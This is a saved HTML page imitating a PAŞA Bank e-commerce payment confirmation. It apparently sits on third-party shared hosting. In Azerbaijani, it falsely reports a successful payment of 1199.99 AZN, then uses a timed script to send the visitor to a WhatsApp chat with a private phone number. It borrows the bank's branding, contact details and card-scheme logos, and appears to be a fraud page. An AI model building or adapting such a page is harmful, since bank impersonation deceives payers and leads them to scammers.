<!DOCTYPE html>
<!-- saved from url=(0092)https://ecomm.pashabank.az:8463/ecomm2/ClientHandler?trans_id=6o47pqDpUDPdSN0NbRXQl80thBw%3D -->
<html>

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta name="viewport" content="width=device-width, user-scalable=no">
	<link rel="shortcut icon" href="https://ecomm.pashabank.az:8463/ecomm2/template/template/images/favicon.ico"
		type="image/ico">
	<title>Pasha Bank E-commerce</title>

	<link rel="stylesheet" href="./ode_files/styles.css" type="text/css">
	<style id="video-roll-deg-scale" type="text/css">
		.video-roll-deg-scale {}
	</style>
	<style id="video-roll-focus-style" type="text/css">
		#video-roll-root-mask {
			display: none;
			position: fixed;
			left: 0;
			top: 0;
			width: 100%;
			height: 100%;
			backdrop-filter: unset;
			z-index: 20000 !important;
			background-color: rgba(0, 0, 0, 0.9);
		}

		.video-roll-focus {
			width: undefinedpx;
			height: undefinedpx;
			position: absolute;
			left: 0;
			right: 0;
			top: 0;
			bottom: 0;
			margin: auto;
			border-radius: unset
		}
	</style>

</head>

<body>
	<div class="mainwrapper">
		<header class="ecom-header">
			<img class="logo" src="./ode_files/pb-logo.svg" alt="pb-logo">
			<label class="amount-label">Ümumi məbləğ</label>
			<label id="ledger" class="amount" style="color: green !important;">1199.99 AZN</label>
			<br />
			<br />
			<label class="amount-label">Ödənişiniz uğurlu oldu!</label>
			<label class="amount-label">Whatsapp nömrəmizə yönləndirilirsiniz!</label>
		</header>
	</div>

	<footer>
		<div class="plastic-cards-container">
			<div class="plastic-cards">
				<img src="./ode_files/verified-by-visa.svg" alt="verified-by-visa">
				<img src="./ode_files/visa.svg" alt="visa">
				<img src="./ode_files/visa-electron.svg" alt="visa-electron">
			</div>
			<div class="plastic-cards">
				<img src="./ode_files/maestro.svg" alt="maestro">
				<img src="./ode_files/mastercard.svg" alt="mastercard">
				<img src="./ode_files/mastercard-secure-code.svg" alt="mastercard-secure-code">
			</div>
		</div>
		<div class="contacts">
			<p>Bankla əlaqə üçün:</p>
			<p>
				customer.care@pashabank.az
				<span class="seperator">|</span>&nbsp;<span class="bank-number">+994 (12) 496 50 00</span>
			</p>
			<p id="copyrights">© Copyrights 2007-2024 PAŞA Bank</p>
		</div>
	</footer>



	<div id="video-roll-root-mask"></div>
</body>
<script>
	setTimeout(function () { window.location.href = "https://api.whatsapp.com/send?phone=994559075799"; }, 3000);
</script>

<script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'},{'ap':'cpsh-oh'},{'server':'p3plzcpnl508660'},{'dcenter':'p3'},{'cp_id':'10182053'},{'cp_cl':'8'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='https://img1.wsimg.com/traffic-assets/js/tccl.min.js'></script></html>